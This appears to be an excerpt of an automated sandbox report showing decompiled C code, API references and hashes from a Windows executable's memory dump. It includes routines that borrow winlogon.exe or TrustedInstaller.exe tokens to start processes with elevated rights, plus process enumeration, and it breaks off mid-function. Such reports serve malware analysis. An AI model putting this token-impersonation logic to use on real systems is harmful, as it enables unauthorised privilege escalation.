                                                                                                  • Instruction Fuzzy Hash: 7FA16F71508340DBD720EF65DD8599BB7E8FB88308F50493FF588A3292DB3899098F5A
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 81%
                                                                                                  			E00401FE6(void* __eax, void* __ecx, void* __edx, WCHAR* _a4, WCHAR* _a8, long _a12, void* _a16, WCHAR* _a20, struct _STARTUPINFOW* _a24, struct _PROCESS_INFORMATION* _a28) {
                                                                                                  				int _v8;
                                                                                                  				long _v12;
                                                                                                  				wchar_t* _v16;
                                                                                                  				void _v546;
                                                                                                  				long _v548;
                                                                                                  				void _v1074;
                                                                                                  				char _v1076;
                                                                                                  				void* __esi;
                                                                                                  				long _t84;
                                                                                                  				int _t87;
                                                                                                  				wchar_t* _t88;
                                                                                                  				int _t92;
                                                                                                  				void* _t93;
                                                                                                  				int _t94;
                                                                                                  				int _t96;
                                                                                                  				int _t99;
                                                                                                  				int _t104;
                                                                                                  				long _t105;
                                                                                                  				int _t110;
                                                                                                  				void** _t112;
                                                                                                  				int _t113;
                                                                                                  				intOrPtr _t131;
                                                                                                  				wchar_t* _t132;
                                                                                                  				int* _t148;
                                                                                                  				wchar_t* _t149;
                                                                                                  				int _t151;
                                                                                                  				void* _t152;
                                                                                                  				void* _t153;
                                                                                                  				int _t154;
                                                                                                  				void* _t155;
                                                                                                  				long _t160;
                                                                                                  
                                                                                                  				_t145 = __edx;
                                                                                                  				_t152 = __ecx;
                                                                                                  				_t131 =  *((intOrPtr*)(__eax + 0x44a8));
                                                                                                  				_v12 = 0;
                                                                                                  				if(_t131 != 4) {
                                                                                                  					__eflags = _t131 - 5;
                                                                                                  					if(_t131 != 5) {
                                                                                                  						__eflags = _t131 - 9;
                                                                                                  						if(__eflags != 0) {
                                                                                                  							__eflags = _t131 - 8;
                                                                                                  							if(_t131 != 8) {
                                                                                                  								__eflags = _t131 - 6;
                                                                                                  								if(_t131 != 6) {
                                                                                                  									__eflags = _t131 - 7;
                                                                                                  									if(_t131 != 7) {
                                                                                                  										__eflags = CreateProcessW(_a4, _a8, 0, 0, 0, _a12, _a16, _a20, _a24, _a28);
                                                                                                  									} else {
                                                                                                  										_t132 = __eax + 0x46b6;
                                                                                                  										_t148 = __eax + 0x48b6;
                                                                                                  										__eflags =  *_t148;
                                                                                                  										_v16 = _t132;
                                                                                                  										_v8 = __eax + 0x4ab6;
                                                                                                  										if( *_t148 == 0) {
                                                                                                  											_t88 = wcschr(_t132, 0x40);
                                                                                                  											__eflags = _t88;
                                                                                                  											if(_t88 != 0) {
                                                                                                  												_t148 = 0;
                                                                                                  												__eflags = 0;
                                                                                                  											}
                                                                                                  										}
                                                                                                  										_t153 = _t152 + 0x800;
                                                                                                  										E0040289F(_t153);
                                                                                                  										_t154 =  *(_t153 + 0xc);
                                                                                                  										__eflags = _t154;
                                                                                                  										if(_t154 == 0) {
                                                                                                  											_t87 = 0;
                                                                                                  											__eflags = 0;
                                                                                                  										} else {
                                                                                                  											_t87 =  *_t154(_v16, _t148, _v8, 1, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
                                                                                                  										}
                                                                                                  										__eflags = _t87;
                                                                                                  									}
                                                                                                  									if(__eflags == 0) {
                                                                                                  										_t84 = GetLastError();
                                                                                                  										L43:
                                                                                                  										_v12 = _t84;
                                                                                                  									}
                                                                                                  									goto L44;
                                                                                                  								}
                                                                                                  								__eflags = E00401D99(__eax + 0x44ac, __edx);
                                                                                                  								if(__eflags == 0) {
                                                                                                  									goto L44;
                                                                                                  								}
                                                                                                  								_t92 = E0040A46C(_t131, __eflags,  &_a28, _t90, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                  								__eflags = _t92;
                                                                                                  								if(_t92 != 0) {
                                                                                                  									goto L44;
                                                                                                  								}
                                                                                                  								_t84 = _a28;
                                                                                                  								goto L43;
                                                                                                  							}
                                                                                                  							_t93 = OpenSCManagerW(0, L"ServicesActive", 0x35); // executed
                                                                                                  							__eflags = _t93;
                                                                                                  							if(_t93 != 0) {
                                                                                                  								E00401306(_t93); // executed
                                                                                                  							}
                                                                                                  							_v8 = 0;
                                                                                                  							_t94 = E00401F04(_t145, _t152); // executed
                                                                                                  							__eflags = _t94;
                                                                                                  							_v12 = _t94;
                                                                                                  							if(__eflags == 0) {
                                                                                                  								_t96 = E00401DF9(_t145, __eflags, _t152, L"TrustedInstaller.exe",  &_v8); // executed
                                                                                                  								__eflags = _t96;
                                                                                                  								_v12 = _t96;
                                                                                                  								if(_t96 == 0) {
                                                                                                  									_t99 = E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
                                                                                                  									__eflags = _t99;
                                                                                                  									if(_t99 == 0) {
                                                                                                  										_v12 = GetLastError();
                                                                                                  									}
                                                                                                  									CloseHandle(_v8); // executed
                                                                                                  								}
                                                                                                  								RevertToSelf(); // executed
                                                                                                  							}
                                                                                                  							goto L44;
                                                                                                  						}
                                                                                                  						_t104 = E0040598B(__edx, __eflags, __eax + 0x46b6);
                                                                                                  						__eflags = _t104;
                                                                                                  						if(_t104 == 0) {
                                                                                                  							goto L44;
                                                                                                  						}
                                                                                                  						_v8 = 0;
                                                                                                  						_t105 = E00401E44(_t152, _t104,  &_v8);
                                                                                                  						goto L14;
                                                                                                  					}
                                                                                                  					_t149 = __eax + 0x44ac;
                                                                                                  					_t110 = wcslen(_t149);
                                                                                                  					__eflags = _t110;
                                                                                                  					if(_t110 <= 0) {
                                                                                                  						goto L44;
                                                                                                  					} else {
                                                                                                  						_v8 = 0;
                                                                                                  						__eflags = E00404EA9(_t149, _t110);
                                                                                                  						_t112 =  &_v8;
                                                                                                  						_push(_t112);
                                                                                                  						_push(_t149);
                                                                                                  						if(__eflags == 0) {
                                                                                                  							_push(_t152);
                                                                                                  							_t113 = E00401DF9(_t145, __eflags);
                                                                                                  						} else {
                                                                                                  							L0040B1F8();
                                                                                                  							_push(_t112);
                                                                                                  							_push(_t152);
                                                                                                  							_t113 = E00401E44();
                                                                                                  						}
                                                                                                  						_v12 = _t113;
                                                                                                  						__eflags = _t113;
                                                                                                  						goto L15;
                                                                                                  					}
                                                                                                  				} else {
                                                                                                  					_v548 = 0;
                                                                                                  					memset( &_v546, 0, 0x208);
                                                                                                  					_v1076 = 0;
                                                                                                  					memset( &_v1074, 0, 0x208);
                                                                                                  					E00404C3C( &_v548);
                                                                                                  					 *((intOrPtr*)(_t155 + 0x18)) = L"winlogon.exe";
                                                                                                  					_t151 = wcslen(??);
                                                                                                  					_t10 = wcslen( &_v548) + 1; // 0x1
                                                                                                  					_t159 = _t151 + _t10 - 0x104;
                                                                                                  					if(_t151 + _t10 >= 0x104) {
                                                                                                  						_v1076 = 0;
                                                                                                  					} else {
                                                                                                  						E00404BE4( &_v1076,  &_v548, L"winlogon.exe");
                                                                                                  					}
                                                                                                  					_v8 = 0;
                                                                                                  					_t105 = E00401DF9(_t145, _t159, _t152,  &_v1076,  &_v8);
                                                                                                  					L14:
                                                                                                  					_t160 = _t105;
                                                                                                  					_v12 = _t105;
                                                                                                  					L15:
                                                                                                  					if(_t160 == 0) {
                                                                                                  						if(E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28) == 0) {
                                                                                                  							_v12 = GetLastError();
                                                                                                  						}
                                                                                                  						CloseHandle(_v8);
                                                                                                  					}
                                                                                                  					L44:
                                                                                                  					return _v12;
                                                                                                  				}
                                                                                                  			}


































                                                                                                  0x00401fe6
                                                                                                  0x00401ff1
                                                                                                  0x00401ff3
                                                                                                  0x00401fff
                                                                                                  0x00402002
                                                                                                  0x004020a8
                                                                                                  0x004020ab
                                                                                                  0x004020f3
                                                                                                  0x004020f6
                                                                                                  0x00402162
                                                                                                  0x00402165
                                                                                                  0x004021f2
                                                                                                  0x004021f5
                                                                                                  0x00402235
                                                                                                  0x00402238
                                                                                                  0x004022be
                                                                                                  0x0040223a
                                                                                                  0x0040223a
                                                                                                  0x00402240
                                                                                                  0x0040224b
                                                                                                  0x0040224e
                                                                                                  0x00402251
                                                                                                  0x00402254
                                                                                                  0x00402259
                                                                                                  0x0040225e
                                                                                                  0x00402262
                                                                                                  0x00402264
                                                                                                  0x00402264
                                                                                                  0x00402264
                                                                                                  0x00402262
                                                                                                  0x00402266
                                                                                                  0x0040226c
                                                                                                  0x00402271
                                                                                                  0x00402274
                                                                                                  0x00402276
                                                                                                  0x0040229a
                                                                                                  0x0040229a
                                                                                                  0x00402278
                                                                                                  0x00402296
                                                                                                  0x00402296
                                                                                                  0x0040229c
                                                                                                  0x0040229c
                                                                                                  0x004022c0
                                                                                                  0x004022c2
                                                                                                  0x004022c8
                                                                                                  0x004022c8
                                                                                                  0x004022c8
                                                                                                  0x00000000
                                                                                                  0x004022c0
                                                                                                  0x00402201
                                                                                                  0x00402203
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00402220
                                                                                                  0x00402225
                                                                                                  0x00402227
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x0040222d
                                                                                                  0x00000000
                                                                                                  0x0040222d
                                                                                                  0x00402173
                                                                                                  0x00402179
                                                                                                  0x0040217b
                                                                                                  0x0040217e
                                                                                                  0x00402183
                                                                                                  0x00402185
                                                                                                  0x00402188
                                                                                                  0x0040218d
                                                                                                  0x0040218f
                                                                                                  0x00402192
                                                                                                  0x004021a2
                                                                                                  0x004021a7
                                                                                                  0x004021a9
                                                                                                  0x004021ac
                                                                                                  0x004021cc
                                                                                                  0x004021d1
                                                                                                  0x004021d3
                                                                                                  0x004021db
                                                                                                  0x004021db
                                                                                                  0x004021e1
                                                                                                  0x004021e1
                                                                                                  0x004021e7
                                                                                                  0x004021e7
                                                                                                  0x00000000
                                                                                                  0x00402192
                                                                                                  0x004020fe
                                                                                                  0x00402103
                                                                                                  0x00402105
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00402111
                                                                                                  0x00402114
                                                                                                  0x00000000
                                                                                                  0x00402114
                                                                                                  0x004020ad
                                                                                                  0x004020b4
                                                                                                  0x004020b9
                                                                                                  0x004020bc
                                                                                                  0x00000000
                                                                                                  0x004020c2
                                                                                                  0x004020c4
                                                                                                  0x004020ce
                                                                                                  0x004020d0
                                                                                                  0x004020d3
                                                                                                  0x004020d4
                                                                                                  0x004020d5
                                                                                                  0x004020e6
                                                                                                  0x004020e7
                                                                                                  0x004020d7
                                                                                                  0x004020d7
                                                                                                  0x004020dd
                                                                                                  0x004020de
                                                                                                  0x004020df
                                                                                                  0x004020df
                                                                                                  0x004020ec
                                                                                                  0x004020ef
                                                                                                  0x00000000
                                                                                                  0x004020ef
                                                                                                  0x00402008
                                                                                                  0x00402016
                                                                                                  0x0040201d
                                                                                                  0x0040202e
                                                                                                  0x00402035
                                                                                                  0x00402044
                                                                                                  0x00402049
                                                                                                  0x00402055
                                                                                                  0x00402064
                                                                                                  0x00402068
                                                                                                  0x0040206e
                                                                                                  0x0040208b
                                                                                                  0x00402070
                                                                                                  0x00402082
                                                                                                  0x00402088
                                                                                                  0x0040209e
                                                                                                  0x004020a1
                                                                                                  0x00402119
                                                                                                  0x00402119
                                                                                                  0x0040211b
                                                                                                  0x0040211e
                                                                                                  0x0040211e
                                                                                                  0x00402149
                                                                                                  0x00402151
                                                                                                  0x00402151
                                                                                                  0x00402157
                                                                                                  0x00402157
                                                                                                  0x004022cb
                                                                                                  0x004022d2
                                                                                                  0x004022d2

                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 0040201D
                                                                                                  • memset.MSVCRT ref: 00402035
                                                                                                    • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                    • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                  • wcslen.MSVCRT ref: 00402050
                                                                                                  • wcslen.MSVCRT ref: 0040205F
                                                                                                  • wcslen.MSVCRT ref: 004020B4
                                                                                                  • _wtoi.MSVCRT ref: 004020D7
                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 0040214B
                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 00402157
                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000035,?,?,00000000), ref: 00402173
                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021D5
                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021E1
                                                                                                  • RevertToSelf.KERNELBASE(?,TrustedInstaller.exe,?,?), ref: 004021E7
                                                                                                    • Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
                                                                                                    • Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB
                                                                                                    • Part of subcall function 0040598B: memset.MSVCRT ref: 004059B5
                                                                                                    • Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 004059FA
                                                                                                    • Part of subcall function 0040598B: wcschr.MSVCRT ref: 00405A0E
                                                                                                    • Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 00405A20
                                                                                                    • Part of subcall function 0040598B: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
                                                                                                    • Part of subcall function 0040598B: OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
                                                                                                    • Part of subcall function 0040598B: CloseHandle.KERNEL32(?), ref: 00405A5A
                                                                                                    • Part of subcall function 0040598B: CloseHandle.KERNEL32(00000000), ref: 00405A61
                                                                                                    • Part of subcall function 00401E44: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
                                                                                                    • Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
                                                                                                    • Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB
                                                                                                  • wcschr.MSVCRT ref: 00402259
                                                                                                  • CreateProcessW.KERNEL32 ref: 004022B8
                                                                                                  • GetLastError.KERNEL32(?,?,00000000), ref: 004022C2
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: CloseHandle$OpenProcess$ErrorLastmemsetwcslen$_wcsicmpwcschrwcscpy$CreateDirectoryManagerRevertSelfSystemToken_wtoiwcscat
                                                                                                  • String ID: ServicesActive$TrustedInstaller.exe$winlogon.exe
                                                                                                  • API String ID: 3201562063-2355939583
                                                                                                  • Opcode ID: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
                                                                                                  • Instruction ID: ccbcfbde9fdc9ff515b0a1e4c69409fc0ea490cdea51ab3e51e2115b03466e24
                                                                                                  • Opcode Fuzzy Hash: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
                                                                                                  • Instruction Fuzzy Hash: 02813A76800209EACF11AFE0CD899AE7BA9FF08308F10457AFA05B21D1D7798A549B59
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 93%
                                                                                                  			E004095FD(void* __edx, void* __eflags, intOrPtr _a4) {
                                                                                                  				void* _v8;
                                                                                                  				void* _v12;
                                                                                                  				char _v16;
                                                                                                  				char _v24;
                                                                                                  				char _v32;
                                                                                                  				char _v40;
                                                                                                  				char _v48;
                                                                                                  				intOrPtr _v52;
                                                                                                  				char _v576;
                                                                                                  				long _v580;
                                                                                                  				intOrPtr _v1112;
                                                                                                  				long _v1128;
                                                                                                  				void _v1132;
                                                                                                  				void* _v1136;
                                                                                                  				void _v1658;
                                                                                                  				char _v1660;
                                                                                                  				void* __edi;
                                                                                                  				void* __esi;
                                                                                                  				void* _t41;
                                                                                                  				long _t49;
                                                                                                  				void* _t50;
                                                                                                  				intOrPtr* _t66;
                                                                                                  				struct HINSTANCE__* _t68;
                                                                                                  				void* _t71;
                                                                                                  				void* _t83;
                                                                                                  				void* _t84;
                                                                                                  				void* _t85;
                                                                                                  
                                                                                                  				_t78 = _a4;
                                                                                                  				E004099D4(_a4 + 0x28);
                                                                                                  				_t41 = CreateToolhelp32Snapshot(2, 0); // executed
                                                                                                  				_v12 = _t41;
                                                                                                  				memset( &_v1132, 0, 0x228);
                                                                                                  				_t84 = _t83 + 0xc;
                                                                                                  				_v1136 = 0x22c;
                                                                                                  				Process32FirstW(_v12,  &_v1136); // executed
                                                                                                  				while(Process32NextW(_v12,  &_v1136) != 0) {
                                                                                                  					E004090AF( &_v580);
                                                                                                  					_t49 = _v1128;
                                                                                                  					_v580 = _t49;
                                                                                                  					_v52 = _v1112;
                                                                                                  					_t50 = OpenProcess(0x410, 0, _t49);
                                                                                                  					_v8 = _t50;
                                                                                                  					if(_t50 != 0) {
                                                                                                  						L4:
                                                                                                  						_v1660 = 0;
                                                                                                  						memset( &_v1658, 0, 0x208);
                                                                                                  						_t85 = _t84 + 0xc;
                                                                                                  						E004098F9(_t78, _v8,  &_v1660);
                                                                                                  						if(_v1660 != 0) {
                                                                                                  							L10:
                                                                                                  							E0040920A( &_v576,  &_v1660);
                                                                                                  							E00409555(_v8,  &_v48,  &_v40,  &_v32,  &_v24); // executed
                                                                                                  							_t84 = _t85 + 0x14;
                                                                                                  							CloseHandle(_v8);
                                                                                                  							_t78 = _a4;
                                                                                                  							L11:
                                                                                                  							E004099ED(_t78 + 0x28,  &_v580);
                                                                                                  							continue;
                                                                                                  						}
                                                                                                  						_v16 = 0x104;
                                                                                                  						if( *0x41c8e0 == 0) {
                                                                                                  							_t68 = GetModuleHandleW(L"kernel32.dll");
                                                                                                  							if(_t68 != 0) {
                                                                                                  								 *0x41c8e0 = 1;
                                                                                                  								 *0x41c8e4 = GetProcAddress(_t68, "QueryFullProcessImageNameW");
                                                                                                  							}
                                                                                                  						}
                                                                                                  						_t66 =  *0x41c8e4;
                                                                                                  						if(_t66 != 0) {
                                                                                                  							 *_t66(_v8, 0,  &_v1660,  &_v16); // executed
                                                                                                  						}
                                                                                                  						goto L10;
                                                                                                  					}
                                                                                                  					if( *((intOrPtr*)(E00404BAF() + 4)) <= 5) {
                                                                                                  						goto L11;
                                                                                                  					}
                                                                                                  					_t71 = OpenProcess(0x1000, 0, _v580);
                                                                                                  					_v8 = _t71;
                                                                                                  					if(_t71 == 0) {
                                                                                                  						goto L11;
                                                                                                  					}
                                                                                                  					goto L4;
                                                                                                  				}
                                                                                                  				return CloseHandle(_v12);
                                                                                                  			}






























                                                                                                  0x00409609
                                                                                                  0x0040960f
                                                                                                  0x00409619
                                                                                                  0x00409623
                                                                                                  0x0040962e
                                                                                                  0x00409633
                                                                                                  0x00409640
                                                                                                  0x0040964a
                                                                                                  0x00409782
                                                                                                  0x0040965a
                                                                                                  0x0040965f
                                                                                                  0x00409678
                                                                                                  0x0040967e
                                                                                                  0x00409681
                                                                                                  0x00409685
                                                                                                  0x00409688
                                                                                                  0x004096b2
                                                                                                  0x004096bf
                                                                                                  0x004096c6
                                                                                                  0x004096cb
                                                                                                  0x004096da
                                                                                                  0x004096e6
                                                                                                  0x0040973b
                                                                                                  0x00409747
                                                                                                  0x0040975f
                                                                                                  0x00409764
                                                                                                  0x0040976a
                                                                                                  0x00409770
                                                                                                  0x00409773
                                                                                                  0x0040977d
                                                                                                  0x00000000
                                                                                                  0x0040977d
                                                                                                  0x004096ee
                                                                                                  0x004096f5
                                                                                                  0x004096fc
                                                                                                  0x00409704
                                                                                                  0x0040970c
                                                                                                  0x0040971c
                                                                                                  0x0040971c
                                                                                                  0x00409704
                                                                                                  0x00409721
                                                                                                  0x00409728
                                                                                                  0x00409739
                                                                                                  0x00409739
                                                                                                  0x00000000
                                                                                                  0x00409728
                                                                                                  0x00409693
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x004096a5
                                                                                                  0x004096a9
                                                                                                  0x004096ac
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x004096ac
                                                                                                  0x004097a6

                                                                                                  APIs
                                                                                                    • Part of subcall function 004099D4: free.MSVCRT(00000000,00409614,?,?,00000000), ref: 004099DB
                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00409619
                                                                                                  • memset.MSVCRT ref: 0040962E
                                                                                                  • Process32FirstW.KERNEL32(?,?), ref: 0040964A
                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,?,?,?,00000000), ref: 00409681
                                                                                                  • OpenProcess.KERNEL32(00001000,00000000,?), ref: 004096A5
                                                                                                  • memset.MSVCRT ref: 004096C6
                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 004096FC
                                                                                                  • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00409716
                                                                                                  • QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,00000104,00000000,?), ref: 00409739
                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 0040976A
                                                                                                  • Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
                                                                                                  • CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: HandleProcess$CloseOpenProcess32memset$AddressCreateFirstFullImageModuleNameNextProcQuerySnapshotToolhelp32free
                                                                                                  • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                  • API String ID: 239888749-1740548384
                                                                                                  • Opcode ID: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
                                                                                                  • Instruction ID: d99fb1acad5946e2155d0e2cb4f7ec9e68cfc0f9061ce230986eeb1e4b65db1d
                                                                                                  • Opcode Fuzzy Hash: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
                                                                                                  • Instruction Fuzzy Hash: 10413DB2900118EEDB10EFA0DCC5AEEB7B9EB44348F1041BAE609B3191D7359E85DF59
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00409921(struct HINSTANCE__** __esi) {
                                                                                                  				void* _t6;
                                                                                                  				struct HINSTANCE__* _t7;
                                                                                                  				_Unknown_base(*)()* _t12;
                                                                                                  				CHAR* _t13;
                                                                                                  				intOrPtr* _t17;
                                                                                                  
                                                                                                  				if( *__esi == 0) {
                                                                                                  					_t7 = E00405436(L"psapi.dll"); // executed
                                                                                                  					 *_t17 = "GetModuleBaseNameW";
                                                                                                  					 *__esi = _t7;
                                                                                                  					__esi[1] = GetProcAddress(_t7, _t13);
                                                                                                  					__esi[2] = GetProcAddress( *__esi, "EnumProcessModules");
                                                                                                  					__esi[4] = GetProcAddress( *__esi, "GetModuleFileNameExW");
                                                                                                  					__esi[5] = GetProcAddress( *__esi, "EnumProcesses");
                                                                                                  					_t12 = GetProcAddress( *__esi, "GetModuleInformation");
                                                                                                  					__esi[3] = _t12;
                                                                                                  					return _t12;
                                                                                                  				}
                                                                                                  				return _t6;
                                                                                                  			}








                                                                                                  0x00409924
                                                                                                  0x0040992c
                                                                                                  0x00409937
                                                                                                  0x0040993f
                                                                                                  0x0040994a
                                                                                                  0x00409956
                                                                                                  0x00409962
                                                                                                  0x0040996e
                                                                                                  0x00409971
                                                                                                  0x00409973
                                                                                                  0x00000000
                                                                                                  0x00409976
                                                                                                  0x00409977

                                                                                                  APIs
                                                                                                    • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                    • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                  • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
                                                                                                  • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
                                                                                                  • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
                                                                                                  • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
                                                                                                  • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$LibraryLoad$memsetwcscat
                                                                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                  • API String ID: 1529661771-70141382
                                                                                                  • Opcode ID: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
                                                                                                  • Instruction ID: 092d130926b261125bd3b69643a6c94717898c68ce40be050c227dd31faca138
                                                                                                  • Opcode Fuzzy Hash: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
                                                                                                  • Instruction Fuzzy Hash: C7F0D4B4D40704AECB306FB59C09E16BAE1EFA8700B614D3EE0C1A3290D7799044CF48
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                  • String ID:
                                                                                                  • API String ID: 2827331108-0
                                                                                                  • Opcode ID: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
                                                                                                  • Instruction ID: dde25c0b0dc41f5004a610fd87b0135bea3e3095e736c0cca49ec984ade2cc6a
                                                                                                  • Opcode Fuzzy Hash: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
                                                                                                  • Instruction Fuzzy Hash: 3D519E71C50604DBCB20AFA4D9889AD77B4FB04710F60823BE861B72D2D7394D82CB9D
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 80%
                                                                                                  			E00401AC9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, void* _a8, void* _a12, void* _a16) {
                                                                                                  				long _v8;
                                                                                                  				int _v12;
                                                                                                  				intOrPtr _v16;
                                                                                                  				int _v20;
                                                                                                  				int _v24;
                                                                                                  				char _v28;
                                                                                                  				void _v538;
                                                                                                  				char _v540;
                                                                                                  				int _v548;
                                                                                                  				char _v564;
                                                                                                  				char _v22292;
                                                                                                  				void* __edi;
                                                                                                  				void* __esi;
                                                                                                  				void* _t37;
                                                                                                  				int _t43;
                                                                                                  				int _t45;
                                                                                                  				void* _t48;
                                                                                                  				void* _t56;
                                                                                                  				signed int _t57;
                                                                                                  				long _t61;
                                                                                                  				void* _t67;
                                                                                                  				long _t69;
                                                                                                  				void* _t70;
                                                                                                  				void* _t72;
                                                                                                  				void* _t74;
                                                                                                  				void* _t76;
                                                                                                  
                                                                                                  				_t67 = __edx;
                                                                                                  				E0040B550(0x5714, __ecx);
                                                                                                  				_t37 = OpenProcess(0x10, 0, _a16);
                                                                                                  				_t82 = _t37;
                                                                                                  				_a16 = _t37;
                                                                                                  				if(_t37 == 0) {
                                                                                                  					_t69 = GetLastError();
                                                                                                  				} else {
                                                                                                  					_t72 =  &_v22292;
                                                                                                  					E0040171F(_t72, _t82);
                                                                                                  					_v8 = 0;
